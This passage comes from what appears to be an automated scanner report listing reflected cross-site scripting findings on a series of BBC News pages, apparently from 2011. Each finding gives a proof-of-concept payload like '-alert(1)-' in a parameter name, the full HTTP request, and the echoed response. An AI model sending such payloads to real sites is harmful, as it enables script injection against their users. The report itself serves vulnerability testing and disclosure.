       uri: '
...[SNIP]...

1.37. http://www.bbc.co.uk/news/uk-wales-12433322 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f76bc'-alert(1)-'68e3f314177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12433322?f76bc'-alert(1)-'68e3f314177=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=74fd25350e6a46c28b5940cc21d8c8cffe705b3d20d0b26357ada3944c28b3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74fd25350e6a46c28b5940cc21d8c8cffe705b3d20d0b26357ada3944c28b3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476194000,
       editionToServe: 'us',
       queryString: 'f76bc'-alert(1)-'68e3f314177=1',
       referrer: null,
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433322',
       assetType: 'story',
       uri: '
...[SNIP]...

1.38. http://www.bbc.co.uk/news/world-12428938 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d154'-alert(1)-'99e276b557c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-12428938?7d154'-alert(1)-'99e276b557c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=743
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=445da5b50ebab6438aefab435124fb8432de24d330e0410a443baa8406fc20a40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=445da5b50ebab6438aefab435124fb8432de24d330e0410a443baa8406fc20a40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476195000,
       editionToServe: 'us',
       queryString: '7d154'-alert(1)-'99e276b557c=1',
       referrer: null,
       section: 'world',
       sectionPath: '/World',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428938',
       assetType: 'photo_gallery',

...[SNIP]...

1.39. http://www.bbc.co.uk/news/world-12434787 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12434787

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc470'-alert(1)-'c43afc9c799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-12434787?dc470'-alert(1)-'c43afc9c799=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=949dc5d55e4aa6088a3e6077513862ee9dacaba8a0b0f1295babd33fa31553220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=949dc5d55e4aa6088a3e6077513862ee9dacaba8a0b0f1295babd33fa31553220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476200000,
       editionToServe: 'us',
       queryString: 'dc470'-alert(1)-'c43afc9c799=1',
       referrer: null,
       section: 'world',
       sectionPath: '/World',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434787',
       assetType: 'story',
       uri: '
...[SNIP]...

1.40. http://www.bbc.co.uk/news/world-africa-12427390 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12427390

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95ed2'-alert(1)-'4b430e1d460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12427390?95ed2'-alert(1)-'4b430e1d460=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=749d95256e3a668d1bc988927174099600ae441600d0819a24ab0ac5bb01acfa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749d95256e3a668d1bc988927174099600ae441600d0819a24ab0ac5bb01acfa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476205000,
       editionToServe: 'us',
       queryString: '95ed2'-alert(1)-'4b430e1d460=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427390',
       assetType: 'story',

...[SNIP]...

1.41. http://www.bbc.co.uk/news/world-africa-12430115 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12430115

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38c3e'-alert(1)-'0c8a1f2a30e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12430115?38c3e'-alert(1)-'0c8a1f2a30e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=793
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=f47d0515fe9a16cf381ef21151143b9d242dbe9730c0e2e3376d9af085f3faae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f47d0515fe9a16cf381ef21151143b9d242dbe9730c0e2e3376d9af085f3faae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: '38c3e'-alert(1)-'0c8a1f2a30e=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12430115',
       assetType: 'story',

...[SNIP]...

1.42. http://www.bbc.co.uk/news/world-africa-12432292 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12432292

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c63'-alert(1)-'d24de83ef09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12432292?16c63'-alert(1)-'d24de83ef09=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=745
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=94add5f54e6a564f068c88f9b123604231ae0c3dc04081dae4ebba851d908a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94add5f54e6a564f068c88f9b123604231ae0c3dc04081dae4ebba851d908a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476207000,
       editionToServe: 'us',
       queryString: '16c63'-alert(1)-'d24de83ef09=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12432292',
       assetType: 'story',

...[SNIP]...

1.43. http://www.bbc.co.uk/news/world-africa-12433674 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12433674

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aeb1d'-alert(1)-'58350a982a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-africa-12433674?aeb1d'-alert(1)-'58350a982a5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=741df5d5ee8ac77089814c33c1b2b77bfb82fdf21030c1d96b4b33af183436ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=741df5d5ee8ac77089814c33c1b2b77bfb82fdf21030c1d96b4b33af183436ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476208000,
       editionToServe: 'us',
       queryString: 'aeb1d'-alert(1)-'58350a982a5=1',
       referrer: null,
       section: 'africa',
       sectionPath: '/World/Africa',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433674',
       assetType: 'story',

...[SNIP]...

1.44. http://www.bbc.co.uk/news/world-asia-pacific-12427423 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12427423

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8ce0'-alert(1)-'706f0236c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-asia-pacific-12427423?b8ce0'-alert(1)-'706f0236c3d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=649d85853e6a47b0fa8316b75100024ae18ea37660b051e91bcbf3bea8ed339a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=649d85853e6a47b0fa8316b75100024ae18ea37660b051e91bcbf3bea8ed339a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476208000,
       editionToServe: 'us',
       queryString: 'b8ce0'-alert(1)-'706f0236c3d=1',
       referrer: null,
       section: 'asia-pacific',
       sectionPath: '/World/Asia Pacific',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427423',
       assetType
...[SNIP]...

1.45. http://www.bbc.co.uk/news/world-asia-pacific-12428385 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12428385

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2e1'-alert(1)-'f0bdaf6beca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-asia-pacific-12428385?3c2e1'-alert(1)-'f0bdaf6beca=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:29 GMT
Keep-Alive: timeout=10, max=781
Expires: Sat, 12 Feb 2011 02:03:29 GMT
Connection: close
Set-Cookie: BBC-UID=b48d05f5ce2a07510a668c57717d413f81f00306700041ba74dbaac5ff11cc060Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b48d05f5ce2a07510a668c57717d413f81f00306700041ba74dbaac5ff11cc060Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476209000,
       editionToServe: 'us',
       queryString: '3c2e1'-alert(1)-'f0bdaf6beca=1',
       referrer: null,
       section: 'asia-pacific',
       sectionPath: '/World/Asia Pacific',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428385',
       assetType
...[SNIP]...

1.46. http://www.bbc.co.uk/news/world-asia-pacific-12430671 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12430671

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c5e'-alert(1)-'980ebdc7983 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-asia-pacific-12430671?f5c5e'-alert(1)-'980ebdc7983=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:29 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:29 GMT
Connection: close
Set-Cookie: BBC-UID=b4bd15f5ae5a87215a38df0cb10bf2e9f4dda6ad3070a1f96b3be29ccd058fbc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4bd15f5ae5a87215a38df0cb10bf2e9f4dda6ad3070a1f96b3be29ccd058fbc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476209000,
       editionToServe: 'us',
       queryString: 'f5c5e'-alert(1)-'980ebdc7983=1',
       referrer: null,
       section: 'asia-pacific',
       sectionPath: '/World/Asia Pacific',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12430671',
       assetType
...[SNIP]...

1.47. http://www.bbc.co.uk/news/world-middle-east-12435798 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4188e'-alert(1)-'574fa93ae16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12435798?4188e'-alert(1)-'574fa93ae16=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:36 GMT
Keep-Alive: timeout=10, max=673
Expires: Sat, 12 Feb 2011 02:03:36 GMT
Connection: close
Set-Cookie: BBC-UID=84adb5051e3ae7786bd93c17e1dab7c6f118965fc0f0a10a04fb3a058b610cca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84adb5051e3ae7786bd93c17e1dab7c6f118965fc0f0a10a04fb3a058b610cca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 72057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476216000,
       editionToServe: 'us',
       queryString: '4188e'-alert(1)-'574fa93ae16=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435798',
       assetType:
...[SNIP]...

1.48. http://www.bbc.co.uk/news/world-middle-east-12437440 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7200c'-alert(1)-'19377c14f7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437440?7200c'-alert(1)-'19377c14f7c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:35 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:35 GMT
Connection: close
Set-Cookie: BBC-UID=943df555ae8aa707eb944acaf10f529ad76627861000d1999b1b320aaf119f480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=943df555ae8aa707eb944acaf10f529ad76627861000d1999b1b320aaf119f480Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:35 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476215000,
       editionToServe: 'us',
       queryString: '7200c'-alert(1)-'19377c14f7c=1',
       referrer: null,
       section: 'middle-east',
       sectionPath: '/World/Middle East',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437440',
       assetType:
...[SNIP]...

1.49. http://www.bbc.co.uk/news/world-middle-east-12437881 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52c19'-alert(1)-'2a417e9ef2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-middle-east-12437881?52c19'-alert(1)-'2a417e9ef2e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
